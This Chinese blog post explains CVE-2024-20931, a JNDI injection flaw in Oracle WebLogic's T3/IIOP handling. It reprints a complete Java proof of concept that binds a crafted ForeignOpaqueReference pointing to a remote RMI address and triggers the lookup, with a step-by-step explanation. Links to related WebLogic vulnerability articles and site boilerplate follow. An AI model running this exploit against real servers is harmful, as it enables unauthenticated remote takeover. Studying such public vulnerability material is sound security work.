CVE-2024-20931 Oracle 一个基于Weblogic T3\IIOP协议的远程命令执行漏洞

最新推荐文章于 2024-12-10 18:20:52 发布
原创 最新推荐文章于 2024-12-10 18:20:52 发布 · 2.6k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#oracle #数据库 #网络安全 #安全

在Oracle官方最新发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931。此漏洞在2023年10月向Oracle报告的,本质上是CVE-2023-21839补丁的一种绕过,牵涉到一个新的JNDI攻击面。

CVE-2024-20931漏洞概述:

在WebLogic中存在一个名为ForeignOpaqueReference的对象,其getReferent函数在远程对象查询时再次发起JNDI查询,导致了JNDI注入。

目前已经公布了一个POC:

https://github.com/GlassyAmadeus/CVE-2024-20931/blob/main/CVE_2024_20931.java

package com.supeream;

import weblogic.deployment.jms.ForeignOpaqueReference;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;

public class CVE_2024_209321 {
    public static void main(String[] args) throws Exception {
        String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";

        // 创建用来远程绑定对象的InitialContext
        String url = "t3://127.0.0.1:7001"; // 目标机器
        Hashtable env1 = new Hashtable();
        env1.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env1.put(Context.PROVIDER_URL, url); // 目标
        InitialContext c = new InitialContext(env1);

        // ForeignOpaqueReference的jndiEnvironment属性
        Hashtable env2 = new Hashtable();
        env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
        env2.put("datasource", "rmi://127.0.0.1:1099/ygevmj");

        // ForeignOpaqueReference的jndiEnvironment和remoteJNDIName属性
        ForeignOpaqueReference f = new ForeignOpaqueReference();
        Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env2);
        Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        String ldap = "rmi://127.0.0.1:1099/ygevmj";
        remoteJNDIName.set(f, ldap);

        // 远程绑定ForeignOpaqueReference对象
        c.rebind("glassy", f);

        // lookup查询ForeignOpaqueReference对象
        try {
            c.lookup("glassy");
        } catch (Exception e) {
        }
    }
}

  • 引入了weblogic.deployment.jms.ForeignOpaqueReference类,该类是利用CVE-2024-20931漏洞的关键部分,用于进行JNDI注入。

  • 创建了一个InitialContext对象,用于远程绑定对象。

  • 设置了ForeignOpaqueReference的jndiEnvironment属性,其中包含了用于JNDI注入的关键设置,如java.naming.factory.initial和datasource。

  • 设置了ForeignOpaqueReference的remoteJNDIName属性,指定了RMI服务的位置。

  • 使用InitialContext对象的rebind方法将构造的ForeignOpaqueReference对象远程绑定到WebLogic服务器上。

  • 尝试使用lookup方法查询远程绑定的ForeignOpaqueReference对象,触发JNDI注入。

参考下面文章:

JNDI注入的一种新攻击面-CVE-2024-20931分析 | Glassy@Amadeus's Zone

WebLogic Server JNDI注入漏洞复现(CVE-2024-20931)
0xSec
02-23 2634
Oracle发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议远程命令执行漏洞CVE-2024-20931,该漏洞是由于 CVE-2023-21839 漏洞未修补完全,未经身份验证的攻击者通过 T3IIOP进行网络访问来破坏 Oracle WebLogic Server。成功利用此漏洞可能会导致 Oracle WebLogic Server 被接管。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 2613
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
小白实战 | weblogic的JNDI注入漏洞
伏一
05-20 1860
由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。
安全研究所 | JNDI注入的一种新攻击面-CVE-2024-20931分析
Eaglecloud的博客
02-19 1965
Oracle官方最新发布的January 2024补丁中,修复了一个基于Weblogic T3\IIOP协议远程命令执行漏洞CVE-2024-20931,该漏洞由亿格云安全研究员Glassy在2023年10月提交给Oracle,从原理上属于CVE-2023-21839补丁的绕过,其中涉及到一个JNDI的新攻击面,在这里分享出来。
Weblogic T3协议反序列化漏洞
来日可期的博客
12-09 2416
T3协议用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议Weblogic会跟踪连接到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3连接。该链接会通过消除在网络之间的多个协议来最大化效率,从而使用较少的操作系统资源。用于T3连接的协议还可以最大限度减少数据包大小,提高传输速度。
Goby 漏洞发布|Weblogic ForeignOpaqueReference 远程代码执行漏洞CVE-2024-20931
m0_46699477的博客
02-22 745
WebLogic Server 是其中的一个适用于云环境和传统环境的应用服务器组件。WebLogic 存在远程代码执行漏洞,该漏洞允许未经身份验证的攻击者通过 IIOP 协议网络访问并破坏易受攻击的 WebLogic Server,成功的漏洞利用可导致 WebLogic Server 被攻击者接管,从而造成远程代码执行。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 4136
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 1202
CVE-2018-2628
CVE-2024-21006-weblogic远程命令执行漏洞
最新发布
web15085415935的博客
12-10 1014
OracleWebLogicServer 存在远程命令执行漏洞CVE-2024-21006),该漏洞源于T3/IIOP协议存在缺陷,未经身份验证的攻击者可通过T3/IIOP协议受影响的服务器发送恶意的请求,利用LDAP工具执行任意代码。
[240719] OpenAI 发布迷你 AI 模型 GPT-4o mini | Oracle WebLogic 服务器远程代码漏洞
edwinjhlee的博客
07-19 1225
- OpenAI 发布迷你 AI 模型GPT-4o mini - Oracle WebLogic 服务器核心远程代码执行漏洞--CVE-2024-21181
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload
2401_84264662的博客
04-26 1371
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
第48篇:Weblogic最新漏洞修复方法(禁用T3+IIOP协议
热门推荐
ABC_123的博客
01-27 12万+
Part1 前言大家好,我是ABC_123。春节前weblogic爆出了一个新的漏洞CVE-2023-21839,据说有攻击队曾用这个在野0day打穿了某银行目标。通过官方的漏洞描述来看,应该还是借助jndi来实现反序列化漏洞利用,所以此漏洞成功条件是目标一定要出网,而且T3IIOP协议开放。与T3协议IIOP协议相关的weblogic的0day漏洞近几年还会不断地公布出来,要想彻底解决这...
跨越语言的艺术:Weblogic序列化漏洞IIOP协议
m0_46699477的博客
04-14 1099
我们搞定了IIOP 协议跨语言通信的方案,完美实现了漏洞的检测与漏洞利用效果
跨越语言的艺术:Weblogic序列化漏洞IIOP协议(1)
m0_60388216的博客
04-12 466
/ 绑定远程对象 Request消息 rebind_any方法。// 执行远程对象中的方法。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 2135
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
Weblogic远程代码执行漏洞CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 5061
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
使用jmx监控weblogic启用iiop协议
pengcongemail的专栏
09-30 2837
使用jmx监控weblogic服务器。建一个java工程,引入weblogic.jar到工程里面。 package com.tst.idc.weblogic; import java.io.IOException; import java.text.SimpleDateFo
【详细步骤关闭IIOP方法】Weblogic WLS组件IIOP协议远程代码执行漏洞CVE-2020-2551)
beyond_zb的博客
04-26 1万+
漏洞信息如下: 绿盟科技——【威胁通告】Weblogic WLS组件IIOP协议远程代码执行漏洞CVE-2020-2551) 详细从操作方法如下: 点击左侧服务,然后在右侧点击服务器配置下的协议,选择IIOP,在锁定服务器配置后进行编辑。 ...
安全研究所 - JNDI注入的一种新攻击面-CVE-2024-20931分析
A_991128a的博客
04-20 843
Weblogic通过T3\IIOP进行绑定的远程对象实现了OpaqueReference接口,那么在对该对象进行lookup时,会调用这个对象的getReferent函数进行查询。![图片](https://img-而碰巧有一个名为ForeignOpaqueReference的对象,它的getReferent函数在进行远程对象查询的时候,会再次发起JNDI查询,从而造成了JNDI注入。![图片](https://img-
WebLogic T3/IIOP RCE漏洞分析:CVE-2020-14756
资源摘要信息:"CVE-2020-14756是一个安全漏洞,影响WebLogic T3/IIOP协议处理中的coherence.jar组件。该漏洞存在于ExternalizableHelper.class文件中,允许远程代码执行(RCE),意味着攻击者可以远程执行任意代码。...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值